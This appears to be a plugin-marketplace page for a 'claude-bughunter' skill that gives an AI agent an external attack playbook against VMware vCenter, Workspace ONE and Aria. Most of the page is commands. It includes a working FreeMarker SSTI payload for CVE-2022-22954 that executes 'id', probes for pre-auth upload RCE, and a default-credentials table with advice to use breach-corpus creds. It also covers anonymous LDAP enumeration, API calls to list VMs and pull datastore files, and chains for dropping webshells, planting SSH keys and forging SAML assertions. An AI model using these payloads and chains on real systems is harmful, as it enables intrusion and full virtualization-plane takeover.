Stats
Actions
Tags
Help us improve
Share bugs, ideas, or general feedback.
From claude-bughunter
External attack matrix for VMware vCenter/vSphere/Workspace ONE/Aria: version fingerprinting, high-impact CVE chain, default creds, SSO disclosure, LDAP enumeration. Use when recon shows vCenter on port 443.
npx claudepluginhub elementalsouls/claude-bughunterHow this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:vmware-vcenter-attackThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Trigger when external recon shows ANY of:
Attack matrix for external SSL VPN appliances (Cisco, Fortinet, Citrix, Palo Alto, Ivanti, SonicWall, F5). Covers fingerprinting, CVE lookup, default creds, config disclosure, and pre-auth exploits for initial access.
References 100 critical web vulnerabilities by category with definitions, root causes, impacts, and mitigations. Useful for web security audits, testing, and remediation.
Structured reference for 100 critical web vulnerabilities organized by category, with definitions, root causes, impacts, and mitigations for systematic security assessment.
Share bugs, ideas, or general feedback.
Trigger when external recon shows ANY of:
/ui, /ui/login, /websso/SAML2/Metadata, /sdk, /mob (Managed Object Browser)vcenter / vsphere / vcsa / psc / vmware/SAAS, /SAAS/auth, /SAAS/login, /SAAS/horizon/vco, /vco-controlcenter, /orchestrator, /lcm/api/v1/portal, /adminDo NOT use for:
TARGET="vcenter.target.com"
# Build info endpoint (often public; revealing exact patch level)
curl -sk "https://$TARGET/sdk/vimServiceVersions.xml"
# UI build (visible in page source)
curl -sk "https://$TARGET/ui/login" | grep -oE 'build[^"]{0,40}'
curl -sk "https://$TARGET/ui/" | grep -oE 'vsphere[^"]{0,40}'
# REST API version (vSphere 7+)
curl -sk "https://$TARGET/api/appliance/system/version"
# Cert metadata
echo | openssl s_client -connect "$TARGET:443" -servername "$TARGET" 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alt"
# SSO Admin Service (info disclosure)
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local"
Map build → version → CVE applicability via VMware advisories (vmware.com/security/advisories).
| CVE | Affected | Vector | Status |
|---|---|---|---|
| CVE-2024-37085 | ESXi 7.0/8.0 < specific patch | AD group "ESX Admins" auto-admin bypass | High — Domain takeover→ESXi RCE, exploited in ransomware ops |
| CVE-2024-22273 | ESXi/Workstation/Fusion/vCenter storage controller | OOB read/write — requires VM-local access (NOT a pre-auth network SSRF; see Section 9) | Important (CVSS 8.1), not external pre-auth |
| CVE-2024-22252/53 | Workstation/Fusion (not vCenter) | Sandbox escape | Not external |
| CVE-2023-34048 | vCenter 7/8 < specific build | DCE/RPC pre-auth heap OOB write → RCE | Critical, patched 2023-10 |
| CVE-2023-20887 | Aria Operations for Networks | Pre-auth command injection → RCE | Critical |
| CVE-2023-20892 | vCenter 7/8 | Use-after-free in DCE/RPC | High |
| CVE-2022-31656/31659 | Workspace ONE Access 21.x | Pre-auth SSRF + auth bypass | Critical chained |
| CVE-2022-22954 | Workspace ONE Access | Pre-auth server-side template injection (SSTI) → RCE | Critical, widely exploited |
| CVE-2021-22005 | vCenter 6.7/7.0 < build | Analytics service pre-auth file upload → RCE | Critical |
| CVE-2021-21985 | vCenter 6.5/6.7/7.0 < build | vSAN Health Check plugin pre-auth RCE | Critical |
| CVE-2021-21972 | vCenter 6.5/6.7/7.0 < build | vRealize plugin /ui/vropspluginui/rest/services/uploadova pre-auth file upload → RCE | Critical, exploited heavily |
| CVE-2020-3992 | ESXi OpenSLP | Pre-auth use-after-free → RCE | Critical, ESXi ransomware vector |
| CVE-2019-5544 | ESXi OpenSLP | Pre-auth heap overflow | Critical |
# Detection only — DO NOT execute the file upload without explicit scope OK
curl -sk -o /dev/null -w "%{http_code}\n" \
"https://$TARGET/ui/vropspluginui/rest/services/uploadova"
# 405 → endpoint exists, version vulnerable
# 404 → patched (endpoint removed)
# 401 → patched (auth required)
curl -sk -o /dev/null -w "%{http_code}\n" \
"https://$TARGET/ui/vropspluginui/rest/services/getstatus"
Public PoC by Mikhail Klyuchnikov exists; do not execute against client infra without explicit RCE-attempt sign-off.
# Stage A — detection only: reachability + baseline. No command execution yet.
curl -sk -o /tmp/wone_baseline.txt -w "%{http_code}\n" \
"https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=probe"
# 4xx with FreeMarker/catalog-portal error template → endpoint present, candidate vulnerable.
# 404 → patched/removed. Keep the baseline body to diff against Stage B.
# Stage B — execution (ONLY with explicit RCE-attempt sign-off): emit a unique canary
# so a coincidental WAF/error page containing "uid=" cannot be mistaken for real output.
CANARY="VCTR$(head -c8 /dev/urandom | od -An -tx1 | tr -d ' \n')"
curl -sk "https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=\${\"freemarker.template.utility.Execution\"?new()(\"echo ${CANARY}; id\")}"
# Confirmed RCE ONLY if the response contains the exact $CANARY echoed back AND "uid=" output
# that is absent from /tmp/wone_baseline.txt (in-band command output, body-diff against baseline).
Confirmed RCE requires the unique $CANARY reflected in-band plus uid= output not present in the Stage-A baseline → critical. Stop and report. A bare uid= with no canary echo is NOT confirmation.
| Product | Default user | Default password |
|---|---|---|
| vCenter 6.x | administrator@vsphere.local | <set-during-install> |
| vCenter Appliance root | root | vmware (legacy) or <set> |
| ESXi root | root | <blank> or vmware |
| vCenter Server Appliance Mgmt (5480) | root | <set-during-install> |
| Aria Operations | admin | vmware (legacy) |
| Workspace ONE | admin | <set> |
⚠ Do not spray vCenter — administrator@vsphere.local has VERY low lockout threshold (often 3 attempts → 60s lockout, configurable to permanent). One attempt with high-confidence guess only. Use creds discovered in breach corpora.
# SSO Admin endpoint (frequently exposes domain info)
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local" | xmllint --format -
# Extract Identity Source info
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"
# Try anonymous LDAP bind to vmdir (port 389/636 if exposed)
ldapsearch -x -H "ldap://$TARGET:389" -b "" -s base
ldapsearch -x -H "ldap://$TARGET:389" -b "cn=Configuration,cn=vmware,cn=cis,dc=vsphere,dc=local"
curl -skI "https://$TARGET/mob"
# 401 → auth required (good for the defender)
# 200 → MOB exposed → can browse VMs, hosts, datastores, sessions without credentials in some misconfigs
# Auth'd MOB lets you walk the entire vSphere tree:
curl -sk -u 'administrator@vsphere.local:<pw>' "https://$TARGET/mob/?moid=ServiceInstance&doPath=content"
# Get session token
curl -sk -X POST -u 'user@vsphere.local:<pw>' "https://$TARGET/api/session"
# Returns: "<session-token>"
# List VMs
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/vm"
# List hosts
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/host"
# List datastores
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/datastore"
# Datastore file download (HUGE — VMDK files, snapshots, credentials in cloud-init)
# /folder/<path>?dsName=<ds>&dcPath=<dc>
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/folder?dsName=datastore1&dcPath=Datacenter"
# Metadata
curl -sk "https://$TARGET/SAAS/auth/saml/response"
curl -sk "https://$TARGET/SAAS/auth/wsfed/services/idp"
curl -sk "https://$TARGET/SAAS/jersey/manager/api/health"
curl -sk "https://$TARGET/catalog-portal/services/airwatch/identifiers"
# Login page
curl -sk "https://$TARGET/SAAS/login/0"
# vRealize Operations Manager
curl -sk "https://$TARGET/suite-api/api/versions"
curl -sk "https://$TARGET/casa/nodes/thumbprints"
# Aria Automation
curl -sk "https://$TARGET/csp/gateway/am/api/about"
curl -sk "https://$TARGET/cluster-administration/api/health"
# vRealize Orchestrator
curl -sk "https://$TARGET/vco/api/about"
curl -sk "https://$TARGET/vco-controlcenter/api/health"
vCenter-Exploit collection (multiple PoCs on GitHub for 21972, 21985, 22005)Greenbone/openvas-scanner VMware NASL plugins — version detectionnuclei templates: vmware-vcenter-*.yaml, cve-2021-21972.yaml, cve-2022-22954.yamlMetasploit modules: exploit/multi/http/vmware_vcenter_*/ui/vropspluginui/* — IDS signature/sdk from non-management IPadministrator@vsphere.local auth failuresPair with mid-engagement-ir-detection skill — vCenter is monitored heavily in mature SOCs.
If recon reveals vCenter only via VPN (not direct internet) → STOP. That is internal infrastructure and outside the external-only AI scope per feedback_skill_boundaries. The user handles internal vCenter work directly.
Internet-exposed vCenter is unfortunately common on the perimeter — and frequently outdated by years. The 2021-21972 / 21985 / 22954 trifecta still pays in 2026 because patching cycles for hypervisor management are slow and vendor-managed.
| Finding | Severity |
|---|---|
| vCenter on internet, current patch | Informational (attack surface note) |
| vCenter on internet, missing patches with public RCE | Critical (entire virtualization plane compromise) |
| vCenter on internet + default admin password | Critical (immediate full takeover) |
| Workspace ONE on internet, unpatched 22954 | Critical |
| MOB anonymously accessible | High (full topology disclosure) |
| /sdk reachable + version disclosure only | Medium (info disclosure + attack-surface concentration) |
enterprise-vpn-attack — vCenter is frequently the post-VPN target; if VPN is breached, vCenter is the natural next pivot (but internal — defer to user)m365-entra-attack — vCenter SSO sometimes federated to Entra; cred-chain bridgingmid-engagement-ir-detection — vCenter monitoring is sensitive; expect mid-engagement mitigationsredteam-report-template — vCenter findings need clear blast-radius framing (this is the virtualization plane, not just an app)hunt-saml — vCenter Workspace ONE / VMware Identity Manager publishes SAML SP metadata at /SAAS/API/1.0/GET/metadata/idp.xml and consumes assertions at predictable ACS URLs. Chain primitive: vCenter SAML SP metadata reachable → IdP fingerprinted → hunt-saml XSW1-XSW8 against the federating IdP → forged assertion with userPrincipalName=administrator@vsphere.local → SP-impersonation as vCenter admin → full virtualization-plane takeover.hunt-rce — VMware's high-impact CVE catalog (CVE-2021-21972, CVE-2021-21985, CVE-2022-22954, CVE-2023-20887) is almost entirely pre-auth RCE. Chain primitive: vCenter version fingerprint via SSL banner or /ui/login body → confirm patch level missing → hunt-rce deserialization/SSTI gadget from the matching CVE PoC → root on vCenter appliance → API-token mint → cluster-wide VM control.enterprise-vpn-attack — VPN compromise + vCenter on internal-only is a natural post-VPN pivot, but external-only engagement scope sometimes forbids it. Chain primitive: VPN appliance CVE → foothold inside corp network → if scope permits, vmware-vcenter-attack becomes reachable on internal-only vCenter → datacenter takeover.m365-entra-attack — Some VMware deployments federate vCenter SSO to Entra. Chain primitive: vCenter SSO discovery → AuthURL points to login.microsoftonline.com → m365-entra-attack Entra ATO on administrator@vsphere.local synced identity → SAML assertion → vCenter admin without ever brute-forcing vCenter SSO.mid-engagement-ir-detection — VMware vSAN/vCenter alerting is sensitive; expect SOC to patch or block within hours of detection. Chain primitive: confirmed vCenter CVE → run mid-engagement-ir-detection baseline capture BEFORE attempting exploitation → if response patterns change mid-test, capture the SOC-patched state as a SECOND finding (defensive-action observed). Package both via redteam-report-template.These are the load-bearing public references for every CVE called out in the matrix above. Every entry includes the vendor advisory, the originating researcher writeup or KEV-catalog entry, and (where public) in-the-wild exploitation references.
vropspluginui unauthenticated arbitrary file upload (canonical pre-auth RCE)/ui/vropspluginui/rest/services/uploadova with a tar/OVA containing a path-traversal entry. On Windows write webshell.jsp under the vsphere-ui webroot for SYSTEM; on Linux drop authorized_keys under /home/vsphere-ui/.ssh/ and SSH in.uploadova handler did not sanitize archive entry paths.ProxygenController in the vSAN Health plugin → Java unsafe reflection chained with an SSRF primitive → arbitrary method invocation as vsphere-ui → command execution./analytics/telemetry/ph/api/hyper/send) writes attacker-controlled file outside the intended directory; chained with subsequent service abuse to reach RCE as the vCenter service account./catalog-portal/ui/oauth/verify?deviceUdid=${...} injects a FreeMarker template; freemarker.template.utility.Execute runs OS commands as the horizon service account. Single-request RCE.Host header during local-domain login flow; the server routes its internal validation request to the attacker-controlled hostname → returns admin session without legitimate credentials.bash -c invocation. Single unauth POST → root.vmdird crashes shortly before backdoor deployment.ESX Admins and adds an account. ESXi auto-grants every member full admin rights without checking that the group existed at join time. End-to-end: AD foothold → group create → SSH/API root on every domain-joined ESXi host → mass VM encryption.ESX Admins with no domain-scoped identity validation.mid-engagement-ir-detection skill when working a target where vCenter is reachable.The pattern across every entry above: VMware management-plane CVEs are pre-auth, network-reachable, and mass-exploited within days of patch. When external recon surfaces any of these products at a current-minus-one patch level, that is a Critical finding worth a same-day callout in the deliverable — not a Medium info-disclosure.